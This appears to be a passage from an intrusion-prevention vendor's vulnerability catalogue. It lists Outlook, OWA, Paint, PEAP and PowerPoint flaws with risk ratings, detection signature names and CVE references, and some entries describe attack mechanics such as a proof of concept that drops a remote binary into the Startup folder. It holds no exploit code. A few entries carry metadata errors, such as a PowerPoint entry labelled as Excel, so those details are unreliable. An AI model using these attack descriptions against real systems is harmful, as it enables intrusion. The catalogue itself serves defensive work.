First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook Express; Windows Mail
Type: Malfunction
Description: An MHTML redirect to may cause Internet Explorer to allow script access to domains other than the originating site.
Situation: HTTP_SHS-Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability
References:
CVE-2008-1448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1448
BID-30585
http://www.securityfocus.com/bid/30585
MS08-048
http://technet.microsoft.com/security/bulletin/MS08-048
Back to top

Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Outlook Express
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Outlook Express
Type: Malfunction
Description: A vulnerability exists in the MHTML protocol handler of Microsoft Outlook Express. It allows a remote attacker to bypass the domain restriction and execute arbitrary code on the victim computer. Upon opening a malicious email or web page, arbitrary code from a remote location is downloaded and executed without user interaction. The behaviour of the attacked target is dependent on the content of the executed code. The proof of concept exploit provided in this report will start to download a remote binary program and save it to the following local directory without prompting for user interaction. "C:\Documents and Settings\Administrator\Start\Menu\Programs\Startup\"
Situation: File-Text_Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability
References:
CVE-2004-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380
BID-9658
http://www.securityfocus.com/bid/9658
MS04-013
http://technet.microsoft.com/security/bulletin/MS04-013
Back to top

Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft Outlook. A crafted iCal meeting request may be used to execute arbitary code in the context of the current user.
Situation: E-Mail_BS-Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
File-TextId_Microsoft-Outlook-iCal-Meeting-Request-Vevent-Memory-Corruption
References:
CVE-2007-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0033
BID-21931
http://www.securityfocus.com/bid/21931
OSVDB-31252
http://www.osvdb.org/31252
MS07-003
http://technet.microsoft.com/security/bulletin/MS07-003
Back to top

Microsoft-Outlook-Object-Security-Bypass-Vulnerability

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook; Microsoft Office
Type: Insecure Configuration
Description: There is a vulnerability within Microsoft Outlook 2003 that can be triggered remotely through a maliciously crafted email message. This message could bypass Outlook 2003's "Restricted Zone" security setting and gain access to remote resources. The behaviour of the attack target should not change when the victim reads an e-mail embedded with a specially crafted object.
Situation: E-Mail_Microsoft-Outlook-Object-Security-Bypass-Vulnerability
File-Exe_Microsoft-Outlook-Object-Security-Bypass-Vulnerability
References:
CVE-2004-0503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0503
BID-10369
http://www.securityfocus.com/bid/10369
OSVDB-6217
http://www.osvdb.org/6217
Back to top

Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587

About this vulnerability: A vulnerability in Microsoft Office 365 ProPlus
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Integer Overflow
Description: Insufficient input validation of an unknown field in Outlook Rules (Rwz) files causes an integer overflow vulnerability in Microsoft Outlook. A successful exploit may allow an attacker to execute code with the privileges of the affected program.
Situation: File-Binary_Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
File-Binary_Microsoft-Outlook-Rwz-CVE-2018-8587-Integer-Overflow
References:
CVE-2018-8587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8587
Back to top

Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: Moderate
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Platform: Windows
Software: Microsoft Outlook
Type: Input Validation
Description: A denial of service vulnerability exists in Microsoft Office Outlook. The vulnerability is due to incorrect parsing of Content-Type header. A remote attacker could exploit this vulnerability by sending an email that contains crafted HTML. Successful exploitation could result in the Denial of Service.
Situation: SMTP_CS-Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service
References:
CVE-2022-35742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35742
Back to top

Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange
Risk: Moderate
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Exchange.
Situation: File-Text_Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336
References:
CVE-2014-6336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6336
MS14-075
http://technet.microsoft.com/security/bulletin/MS14-075
Back to top

Microsoft-Outlook-RCE-CVE-2015-6123

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: Moderate
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Malfunction
Description: A vulnerability in Microsoft Outlook
Situation: File-Text_Microsoft-Outlook-RCE-CVE-2015-6123
References:
CVE-2015-6123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6123
MS15-116
http://technet.microsoft.com/security/bulletin/MS15-116
Back to top

Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1693-5242
Platform: Generic
Software: Microsoft Outlook
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Outlook.
Situation: File-Text_Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413
References:
CVE-2024-21413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21413
ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb
Back to top

Microsoft-Outlook-Rwz-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Office 365 ProPlus
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Integer Overflow
Description: Insufficient input validation of an unknown field of Outlook Rules (RWZ) files causes an integer overflow vulnerability in Microsoft Outlook. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Microsoft-Outlook-Rwz-Integer-Overflow
References:
CVE-2018-8582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8582
Back to top

Microsoft-Outlook-Security-Feature-Bypass-Vulnerability-CVE-2017-11774

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Generic
Software: Microsoft Outlook
Type: Input Validation
Description: An arbitrary command execution vulnerability exists in Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016, which allows an attacker to inject code to the configurable Outlook home page.
Situation: File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute
References:
CVE-2017-11774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11774
Back to top

Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office Outlook
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Input Validation
Description: A code execution vulnerability has been reported in Microsoft Office Outlook Email client application. The vulnerability is due to a design error while Outlook parses specially crafted email attachments. Remote attackers can exploit this vulnerability by sending a crafted email attachment using the ATTACH_BY_REFERENCE method. Successful exploitation of this vulnerability would result in arbitrary code execution with the privileges of the logged on user.
Situation: E-Mail_BS-Microsoft-Outlook-SMB-Attachment
E-Mail_BS-Microsoft-Outlook-SMB-Msg-Attachment
HTTP_SS-Microsoft-Outlook-SMB-Msg-Attachment
File-OLE_Microsoft-Outlook-SMB-Msg-Attachment
File-Binary_Microsoft-Outlook-SMB-Attachment
File-Binary_Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
References:
CVE-2010-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0266
BID-41446
http://www.securityfocus.com/bid/41446
MS10-045
http://technet.microsoft.com/security/bulletin/MS10-045
Back to top

Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in the Outlook Web Access component of Exchange Server 5.5. The flaw is caused by insufficient sanitization of user's email messages. A malicious user can leverage this flaw to inject and execute script code in the security context of the current user email account. A successful attack exploiting this vulnerability can inject malicious script code into the OWA session. An attacker can read or delete email, access the user's contact list and other operations on the user's mail account. The attacker can fully control the compromised mail account. The malicious script could also take actions on the user's computer in the security context of the OWA web site.
Situation: File-Text_Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability
References:
CVE-2005-0563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563
BID-13952
http://www.securityfocus.com/bid/13952
MS05-029
http://technet.microsoft.com/security/bulletin/MS05-029
Back to top

Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exchange Server
Type: Input Validation
Description: A script injection vulnerability exists in Microsoft Exchange Server running Outlook Web Access (OWA). The vulnerability is caused by improper sanitization of e-mail messages which contain script code when they are read through Outlook Web Access. A malicious user may exploit this flaw to inject and execute HTML and script code in the security context of the target user's browser session.
Situation: SMTP_CS-Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting
References:
CVE-2008-2248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2248
BID-30130
http://www.securityfocus.com/bid/30130
MS08-039
http://technet.microsoft.com/security/bulletin/MS08-039
Back to top

Microsoft-Outlook-Word-Object-Tag

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Input Validation
Description: There is a vulnerability in Microsoft Outlook when Microsoft Word is enabled in Outlook as the default editor for email messages. The vulnerability exists in the handling of object tags, and can be triggered remotely when a user replies or forwards a maliciously crafted email message. This vulnerability could bypass Outlook's "Restricted Zone" security setting and enable arbitrary access to remote resources.
Situation: File-Text_Microsoft-Outlook-Word-Object-Tag
Back to top

Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628

About this vulnerability: A vulnerability in Microsoft Outlook Web Access
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Outlook Web Access
Type: Malfunction
Description: A vulnerability in Microsoft Outlook Web Access
Situation: HTTP_CSH-Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628
References:
CVE-2015-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1628
MS15-026
http://technet.microsoft.com/security/bulletin/MS15-026
Back to top

Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Paint, shipped with various versions of Microsoft Windows. The vulnerability is due to an input validation error while parsing specially crafted JPEG image files. Remote attackers can exploit this vulnerability by enticing target users to open maliciously crafted JPEG image files in a vulnerable version of MS Paint. Successful exploitation would cause a heap buffer overflow that can lead to arbitrary code execution in the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.
Situation: HTTP_SS-Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
File-JPEG_Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
References:
CVE-2010-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0028
BID-38042
http://www.securityfocus.com/bid/38042
MS10-005
http://technet.microsoft.com/security/bulletin/MS10-005
Back to top

Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689

About this vulnerability: An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected
Risk: High
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1557-5242
Platform: Windows
Software: Extensible Authentication Protocol (EAP) service
Type: Heap Overflow
Description: A heap out-of-bound write issue is identified in the Microsoft Protected Extensible Authentication Protocol (PEAP) handler. This vulnerability can be exploited to achieve remote code execution.
Situation: IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689
References:
CVE-2023-21689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21689
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690

About this vulnerability: An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected
Risk: High
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1557-5242
Platform: Windows
Software: Extensible Authentication Protocol (EAP) service
Type: Heap Overflow
Description: A heap out-of-bound write issue is identified in the Microsoft Protected Extensible Authentication Protocol (PEAP) handler. This vulnerability can be exploited to achieve remote code execution.
Situation: IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690
References:
CVE-2023-21690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21690
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Microsoft-PowerPoint-2003-Heap-Overflow

About this vulnerability: Microsoft PowerPoint 2003 Heap Overflow
Risk: High
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1337-5242
Platform: Generic
Software: Microsoft PowerPoint 2003
Type: Malfunction
Description: There exists a heap overflow vulnerability in Microsoft Powerpoint 2003.
Situation: File-Text_Microsoft-PowerPoint-2003-Heap-Overflow
File-OLE_Microsoft-PowerPoint-2003-Heap-Overflow
Back to top

Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
HTTP_SS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
File-OLE_Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
References:
CVE-2009-1131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1131
BID-34841
http://www.securityfocus.com/bid/34841
OSVDB-54393
http://www.osvdb.org/54393
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability

About this vulnerability: An attempt to exploit PowerPoint vulnerability CVE-2011-0655
Risk: Moderate
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: A vulnerability in Microsoft PowerPoint record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
File-OLE_Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
References:
CVE-2011-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0655
MS11-022
http://technet.microsoft.com/security/bulletin/MS11-022
Back to top

Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

About this vulnerability: A heap corruption vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a heap corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
HTTP_SS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
File-OLE_Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
References:
CVE-2009-1130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1130
BID-34840
http://www.securityfocus.com/bid/34840
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396

About this vulnerability: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Situation: HTTP_CSU-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
SMB-TCP_CHS-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
References:
CVE-2011-3396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3396
MS11-094
http://technet.microsoft.com/security/bulletin/MS11-094
Back to top

Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

About this vulnerability: An integer overflow vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is an integer overflow vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
HTTP_SS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
File-OLE_Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
References:
CVE-2009-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0221
BID-34835
http://www.securityfocus.com/bid/34835
OSVDB-54394
http://www.osvdb.org/54394
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224

About this vulnerability: A memory corruption vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
References:
CVE-2009-0224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0224
BID-34879
http://www.securityfocus.com/bid/34879
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
References:
CVE-2009-0225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0225
BID-34880
http://www.securityfocus.com/bid/34880
OSVDB-54388
http://www.osvdb.org/54388
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

About this vulnerability: A memory corruption vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
References:
CVE-2009-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556
BID-34351
http://www.securityfocus.com/bid/34351
OSVDB-53182
http://www.osvdb.org/53182
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
References:
CVE-2009-1128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1128
BID-34837
http://www.securityfocus.com/bid/34837
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft PowerPoint.
Situation: E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
References:
CVE-2009-1129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1129
BID-34839
http://www.securityfocus.com/bid/34839
OSVDB-54387
http://www.osvdb.org/54387
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability

About this vulnerability: An attempt to exploit PowerPoint vulnerability CVE-2011-0976
Risk: Moderate
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: A vulnerability in Microsoft PowerPoint record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
File-OLE_Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
References:
CVE-2011-0976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0976
MS11-022
http://technet.microsoft.com/security/bulletin/MS11-022
Back to top

Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Situation: File-OLE_Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability
References:
CVE-2011-3413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3413
MS11-094
http://technet.microsoft.com/security/bulletin/MS11-094
Back to top

Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution

About this vulnerability: Code execution vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: Microsoft PowerPoint has a code execution vulnerability in the handling of invalid values in the vulnerable records. A remote attacker can exploit the vulnerability by persuading a target user to open a specially crafted PowerPoint file, causing a DoS condition terminating all instances of the PowerPoint application, and potentially leading to a loss of data or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit
References:
CVE-2006-5296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5296
BID-20495
http://www.securityfocus.com/bid/20495
OSVDB-29720
http://www.osvdb.org/29720
Back to top

Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft PowerPoint. The flaw is caused by insufficient checks of a malformed Record contained within a PowerPoint file. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable Microsoft PowerPoint application will terminate when the file is closed or saved. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application might also stop functioning as a result of such an attack.
Situation: File-OLE_Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption
References:
CVE-2006-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3656
BID-18993
http://www.securityfocus.com/bid/18993
Back to top

Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint 2002; Microsoft PowerPoint 2003
Type: Malfunction
Description: There is a vulnerability in Microsoft PowerPoint.
Situation: HTTP_SS-Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
References:
CVE-2011-1270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1270
MS11-036
http://technet.microsoft.com/security/bulletin/MS11-036
Back to top

Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269

About this vulnerability: A vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint 2002; Microsoft PowerPoint 2003; Microsoft PowerPoint 2007; Microsoft Office 2004; Microsoft Office 2008
Type: Malfunction
Description: There is a vulnerability in Microsoft PowerPoint.
Situation: HTTP_SS-Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
References:
CVE-2011-1269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1269
MS11-036
http://technet.microsoft.com/security/bulletin/MS11-036
Back to top

Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office PowerPoint
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint; Microsoft Office; Microsoft Office System
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft PowerPoint. The vulnerability is due to improper boundary checking while parsing the TxMasterStyle10Atom atom in a Powerpoint presentation file. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PowerPoint file, potentially causing arbitrary code to be executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
File-OLE_Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
References:
CVE-2008-1455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1455
BID-30579
http://www.securityfocus.com/bid/30579
MS08-051
http://technet.microsoft.com/security/bulletin/MS08-051
Back to top

Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft PowerPoint Viewer
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint Viewer
Type: Integer Overflow
Description: There is a code execution vulnerability in Microsoft PowerPoint Viewer. The vulnerability is due to a memory allocation error while handling malformed picture index in a PowerPoint file. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PowerPoint file, potentially causing arbitrary code to be executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
File-OLE_Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
References:
CVE-2008-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0121
BID-30554
